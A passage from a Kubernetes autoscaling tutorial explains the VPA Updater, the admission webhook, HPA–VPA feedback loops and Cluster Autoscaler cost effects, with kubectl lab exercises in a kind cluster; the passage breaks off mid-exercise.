&lt;strong&gt;Safety margin&lt;/strong&gt;: &lt;code&gt;+15%&lt;/code&gt; added on top of the percentile estimate (configurable via &lt;code&gt;--recommendation-margin-fraction&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Confidence&lt;/strong&gt;: For containers with sparse samples, confidence intervals widen and recommendations inflate conservatively.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Critically, the Recommender produces three values written to &lt;code&gt;VPA.status.recommendation&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmzfz8cmzcagqxdw8m97.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmzfz8cmzcagqxdw8m97.png" alt="image" width="800" height="905"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Updater&lt;/strong&gt; only evicts a pod if its current requests fall &lt;strong&gt;outside&lt;/strong&gt; the &lt;code&gt;[lowerBound, upperBound]&lt;/code&gt; range — not every time the &lt;code&gt;target&lt;/code&gt; shifts. This prevents constant churn under normal variance.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Updater: The Disruptive Actor
&lt;/h3&gt;

&lt;p&gt;The Updater runs every 1 minute. If a pod's current requests are outside the recommended bounds, the Updater evicts it. The pod is recreated by its owning controller, and the Admission Webhook intercepts that new pod creation to inject the updated requests.&lt;/p&gt;

&lt;p&gt;Two important constraints on Updater behavior:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PodDisruptionBudgets are respected.&lt;/strong&gt; If a PDB is too strict, or the workload is running at minimum replicas, VPA will refuse to evict and silently do nothing. Teams often discover this when VPA appears "stuck" — recommendations update in &lt;code&gt;.status&lt;/code&gt; but pods never change. Check PDB &lt;code&gt;disruptions allowed&lt;/code&gt; if VPA seems inert.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It requires pod restarts.&lt;/strong&gt; In-Place Pod Vertical Scaling (&lt;a href="https://github.com/kubernetes/enhancements/issues/1287" rel="noopener noreferrer"&gt;KEP-1287&lt;/a&gt;) is beta in recent Kubernetes releases but requires feature gates and has provider-specific support constraints. Do not assume it is available without verifying your cluster version and managed Kubernetes provider.&lt;/p&gt;

&lt;p&gt;For stateful workloads, control eviction behavior explicitly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;updatePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;updateMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Off"&lt;/span&gt;        &lt;span class="c1"&gt;# Recommendations only — never evict&lt;/span&gt;
  &lt;span class="c1"&gt;# updateMode: "Initial"  # Inject on creation, never evict running pods&lt;/span&gt;
  &lt;span class="c1"&gt;# updateMode: "Auto"     # Full lifecycle management (default)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Starting with &lt;code&gt;Off&lt;/code&gt; and using VPA as a &lt;strong&gt;recommendation engine&lt;/strong&gt; is the safest posture for stateful workloads. Apply recommendations via a GitOps pipeline or scheduled maintenance window.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 6: Observe VPA Auto Mode and the PDB Blocker
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates VPA's Auto mode evicting pods, then shows how a PDB silently blocks it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Part A: Enable Auto mode and watch the eviction&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Switch hamster VPA to Auto mode&lt;/span&gt;
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  updatePolicy:
    updateMode: "Auto"'&lt;/span&gt;

&lt;span class="c"&gt;# Watch for evictions — VPA will evict pods whose requests differ from recommendation&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; &lt;span class="nv"&gt;reason&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;EvictedByVPA &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;

&lt;span class="c"&gt;# After eviction, check the new pod's actual resource requests&lt;/span&gt;
&lt;span class="c"&gt;# (these are injected by the VPA Admission Controller)&lt;/span&gt;
kubectl get pod &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[0].resources}{"\n"}{end}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The new pods will have different &lt;code&gt;requests&lt;/code&gt; than what's in the Deployment spec. The VPA Admission Controller mutated them at pod creation time. Run &lt;code&gt;kubectl get deployment hamster -o yaml | grep -A5 resources&lt;/code&gt; — the Deployment spec is &lt;em&gt;unchanged&lt;/em&gt;. This is the "advisory manifest" behavior described in the Admission Controller section.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Part B: Create a PDB that blocks eviction&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# First, scale down to 1 replica to make the PDB bite&lt;/span&gt;
kubectl scale deployment hamster &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Create a PDB requiring minAvailable=1&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: hamster-pdb
spec:
  minAvailable: 1
  selector:
    matchLabels:
      app: hamster
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Force VPA to want to evict by temporarily setting a request far outside bounds&lt;/span&gt;
kubectl patch deployment hamster &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'[{"op":"replace","path":"/spec/template/spec/containers/0/resources/requests/cpu","value":"999m"}]'&lt;/span&gt;

&lt;span class="c"&gt;# Wait a couple minutes, then check — VPA recommendations will show divergence&lt;/span&gt;
&lt;span class="c"&gt;# but no eviction will occur&lt;/span&gt;
kubectl describe vpa hamster-vpa | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A20&lt;/span&gt; &lt;span class="s2"&gt;"Conditions:"&lt;/span&gt;
kubectl describe pdb hamster-pdb
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The VPA status will show the recommendation is out of bounds, but the pod is not evicted. The PDB shows &lt;code&gt;Disruptions Allowed: 0&lt;/code&gt;. This is the "VPA appears stuck" scenario described in the Updater section.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pdb hamster-pdb
kubectl scale deployment hamster &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Off"}}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Admission Controller: The Mutation Point
&lt;/h3&gt;

&lt;p&gt;When a pod creation request reaches the API server, the VPA Admission Controller (&lt;code&gt;MutatingWebhookConfiguration&lt;/code&gt;) intercepts it, looks up the VPA object for the pod's owner, and &lt;strong&gt;overwrites &lt;code&gt;resources.requests&lt;/code&gt;&lt;/strong&gt; in the pod spec before it is persisted.&lt;/p&gt;

&lt;p&gt;Your Deployment YAML's resource requests become advisory at runtime — VPA owns the actual values. This is intentional but can surprise teams who expect &lt;code&gt;kubectl get pod -o yaml&lt;/code&gt; to match their manifests.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 7: Confirm the Admission Webhook Mutation
&lt;/h3&gt;

&lt;p&gt;This is a quick but important exercise to internalize that VPA mutates pods at creation time, making manifests advisory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Inspect the MutatingWebhookConfiguration&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl get mutatingwebhookconfigurations | &lt;span class="nb"&gt;grep &lt;/span&gt;vpa
kubectl describe mutatingwebhookconfiguration vpa-webhook-config | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A10&lt;/span&gt; &lt;span class="s2"&gt;"Rules:"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Check the current VPA mode&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Before restarting pods, confirm which update mode VPA is in:&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl get vpa hamster-vpa &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.updatePolicy.updateMode}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;If the mode is &lt;code&gt;Off&lt;/code&gt;&lt;/strong&gt;, the Admission Webhook will not mutate pod requests — the pod spec will match the Deployment manifest exactly. This is expected. You must switch to &lt;code&gt;Initial&lt;/code&gt; (Step 3) to observe the mutation.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Switch to &lt;code&gt;Initial&lt;/code&gt; mode to enable webhook mutation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Initial&lt;/code&gt; mode instructs VPA to inject recommendations at pod creation time, but never evict running pods. This is the safest mode to observe mutation without disruption:&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Initial"}}}'&lt;/span&gt;

&lt;span class="c"&gt;# Confirm the mode change took effect&lt;/span&gt;
kubectl get vpa hamster-vpa &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.updatePolicy.updateMode}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;&lt;strong&gt;Step 4: Restart pods and compare requests&lt;/strong&gt;&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Trigger a rollout so new pods are created (and mutated by the webhook)&lt;/span&gt;
kubectl rollout restart deployment hamster
kubectl rollout status deployment hamster

&lt;span class="c"&gt;# Compare Deployment spec requests vs. actual pod requests&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== Deployment spec requests ==="&lt;/span&gt;
kubectl get deployment hamster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.template.spec.containers[0].resources}'&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== Actual pod requests (post-mutation) ==="&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.metadata.name}{"\n"}{.spec.containers[0].resources}{"\n\n"}{end}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The pod's actual CPU and memory requests should now differ from the Deployment manifest — they reflect VPA's recommendation values injected by the Admission Webhook at pod creation time. The Deployment spec itself is unchanged; VPA only mutates the live pod spec.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;If requests still match after switching to &lt;code&gt;Initial&lt;/code&gt; mode&lt;/strong&gt;, VPA may not have built up enough sample history yet to generate a recommendation. Wait 2–3 minutes and check: &lt;code&gt;kubectl describe vpa hamster-vpa | grep -A10 "Recommendation:"&lt;/code&gt;. If the &lt;code&gt;Recommendation&lt;/code&gt; section is empty, give the workload more time to run before restarting.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Reset VPA mode&lt;/strong&gt;&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Return to Off mode so later exercises start from a known state&lt;/span&gt;
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Off"}}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;




&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  HPA vs VPA: When to Use Which
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvhtt1o1335e5mhhn745.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvhtt1o1335e5mhhn745.png" alt="image" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The safe combination rule&lt;/strong&gt;: Never run HPA and VPA on the same metric. If HPA is managing CPU utilization while VPA is adjusting CPU requests, they form a &lt;strong&gt;destabilizing positive feedback loop&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;VPA increases CPU requests&lt;/li&gt;
&lt;li&gt;Same real CPU usage is now a smaller fraction of the larger request — HPA utilization drops&lt;/li&gt;
&lt;li&gt;HPA scales in (fewer replicas)&lt;/li&gt;
&lt;li&gt;Load concentrates on remaining pods — per-pod CPU rises&lt;/li&gt;
&lt;li&gt;VPA observes higher per-pod usage, increases requests further&lt;/li&gt;
&lt;li&gt;Repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This loop does not converge. It oscillates with each VPA eviction cycle acting as a perturbation that resets the HPA signal. The safe pattern is &lt;strong&gt;HPA on external/custom metrics&lt;/strong&gt; (RPS, queue depth, active connections) with &lt;strong&gt;VPA managing CPU/memory requests&lt;/strong&gt;. Operating on orthogonal signals, the two controllers cannot interfere with each other's feedback paths.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 8: Reproduce the HPA + VPA Feedback Loop
&lt;/h3&gt;

&lt;p&gt;This is the most important exercise in the guide. You will deliberately create the feedback loop described above and observe it destabilize replica count.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy a workload with both CPU-based HPA and VPA in Auto mode&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m
kubectl expose deployment feedback-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# CPU-based HPA&lt;/span&gt;
kubectl autoscale deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8

&lt;span class="c"&gt;# VPA in Auto mode on the same workload&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: feedback-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: feedback-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: feedback-test
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 2
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Apply moderate, sustained load&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl run feedback-load &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;busybox:1.28 &lt;span class="nt"&gt;--restart&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Never &lt;span class="nt"&gt;--&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  /bin/sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;"while true; do wget -q -O- http://feedback-test; sleep 0.1; done"&lt;/span&gt;

&lt;span class="c"&gt;# Monitor replica count and CPU utilization over 10+ minutes&lt;/span&gt;
watch &lt;span class="nt"&gt;-n5&lt;/span&gt; &lt;span class="s2"&gt;"kubectl get hpa feedback-test &amp;amp;&amp;amp; echo '---' &amp;amp;&amp;amp; kubectl get vpa feedback-test-vpa &amp;amp;&amp;amp; echo '---' &amp;amp;&amp;amp; kubectl top pods -l app=feedback-test"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; VPA will adjust CPU requests upward. Each time it does, the same real CPU usage becomes a smaller percentage of the new (larger) request. HPA sees lower utilization and scales in. Fewer pods means more load per pod. VPA observes higher per-pod CPU and adjusts requests further. Watch for oscillation in replica count.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Fix it — switch HPA to a non-CPU metric&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In a real cluster you'd use RPS from Prometheus. In kind, use a &lt;code&gt;ContainerResource&lt;/code&gt; metric on memory instead (orthogonal to CPU), or simply document that the fix is to replace CPU-based HPA with an external/custom metric.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The correct fix: delete the CPU-based HPA, use a different signal&lt;/span&gt;
kubectl delete hpa feedback-test

&lt;span class="c"&gt;# In production, replace with:&lt;/span&gt;
&lt;span class="c"&gt;# - An ingress RPS metric via Prometheus Adapter&lt;/span&gt;
&lt;span class="c"&gt;# - A queue depth metric via KEDA&lt;/span&gt;
&lt;span class="c"&gt;# - An active connections metric from your load balancer&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pod feedback-load &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete deployment feedback-test
kubectl delete hpa feedback-test &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete vpa feedback-test-vpa
kubectl delete svc feedback-test
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Cluster Autoscaler Interaction
&lt;/h2&gt;

&lt;p&gt;HPA and VPA both create pressure on the node pool, but on different timescales and through different mechanisms.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqvyqvucy6pbwhc3a6r4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqvyqvucy6pbwhc3a6r4.png" alt="image" width="800" height="1003"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPA is fast. CA is slow.&lt;/strong&gt; Node bootstrap time is the &lt;strong&gt;dominant constant in the system&lt;/strong&gt; — every autoscaling strategy is bounded by it. The 2–4 minute bootstrap lag (longer for GPU or large instance types) sets a hard floor on how quickly new capacity can serve traffic. Any strategy that relies on CA to absorb spikes has accepted this floor as a design constraint.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CA solves local schedulability, not global efficiency.&lt;/strong&gt; CA provisions enough nodes to schedule the pods that are currently &lt;code&gt;Pending&lt;/code&gt;. It does not optimize bin-packing across the cluster — it does not rebalance existing pods, consolidate fragmented nodes, or optimize for cost. This is why VPA can increase node count even when actual CPU utilization is low: the scheduler makes placement decisions based on &lt;code&gt;requests&lt;/code&gt;, not observed usage. VPA inflates requests → pods no longer fit on existing nodes → CA provisions new nodes → actual utilization stays flat or even falls. The cluster grows without the workload growing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;VPA raises the node pressure threshold — and can increase your bill.&lt;/strong&gt; VPA increases &lt;code&gt;requests&lt;/code&gt;, not &lt;code&gt;limits&lt;/code&gt;. Larger requests make pods harder to schedule on existing nodes, pushing CA to provision additional capacity or larger instance types. This silently changes your node pool's instance shape economics. You may end up with fewer, larger nodes than intended — or more total nodes — without any increase in actual cluster utilization. Monitor instance type distribution and node count trends after enabling VPA in &lt;code&gt;Auto&lt;/code&gt; mode; the cost impact will appear there before it shows up in billing reports.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;🧠 &lt;strong&gt;Mental Model: Requests Drive Cost, Not Usage&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In Kubernetes, you pay for what you &lt;em&gt;reserve&lt;/em&gt;, not what you &lt;em&gt;use&lt;/em&gt;. The scheduler, the bin-packer, and CA all operate on &lt;code&gt;requests&lt;/code&gt;. VPA optimizes &lt;code&gt;requests&lt;/code&gt;. This means every VPA recommendation upward is a potential cost event — even if actual utilization is unchanged.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Autoscaling optimizes for performance first, cost second unless explicitly constrained.&lt;/strong&gt; HPA and VPA have no cost objective — they optimize to keep the metric within bounds. Over-scaling is operationally safer than under-scaling from their perspective. If cost matters (it always does), you need to encode it through &lt;code&gt;maxReplicas&lt;/code&gt;, &lt;code&gt;maxAllowed&lt;/code&gt; bounds, and node pool configuration — the autoscalers will not self-constrain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent CA overshoot&lt;/strong&gt;: If VPA evicts a large batch of pods simultaneously, the scheduler may not fit them all, triggering CA to provision capacity for a transient condition. Stage transitions between VPA &lt;code&gt;updateMode&lt;/code&gt; values, and consider CA's &lt;code&gt;--scale-down-delay-after-add&lt;/code&gt; to prevent immediate scale-in after a VPA-triggered provisioning event.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Overprovisioning buffers&lt;/strong&gt; address the CA latency problem directly. Deploy a &lt;code&gt;Deployment&lt;/code&gt; of low-priority placeholder pods (using a &lt;code&gt;PriorityClass&lt;/code&gt; with a negative value) sized to your expected burst headroom. These pods consume cluster capacity when idle, keeping nodes warm and schedulable. When real pods scale out, the scheduler evicts the placeholder pods to make room — no CA provisioning required. The cost is always-on reserved capacity; the benefit is eliminating the 2–4 minute bootstrap lag from your scaling critical path.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 9: Trigger Pending Pods via VPA Request Inflation
&lt;/h3&gt;

&lt;p&gt;In kind, nodes have fixed resources. You can reproduce the VPA-inflates-requests-causing-unschedulable scenario by setting &lt;code&gt;maxAllowed&lt;/code&gt; to values larger than your kind node's allocatable capacity.&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# First, check your kind nodes' allocatable CPU and memory&lt;/span&gt;
kubectl describe nodes | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A5&lt;/span&gt; &lt;span class="s2"&gt;"Allocatable:"&lt;/span&gt;

&lt;span class="c"&gt;# Deploy a tight workload&lt;/span&gt;
kubectl create deployment inflate-test &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;nginx
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment inflate-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;100m,memory&lt;span class="o"&gt;=&lt;/span&gt;64Mi &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m,memory&lt;span class="o"&gt;=&lt;/span&gt;128Mi
kubectl scale deployment inflate-test &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3

&lt;span class="c"&gt;# Create VPA with maxAllowed far exceeding available per-node headroom&lt;/span&gt;
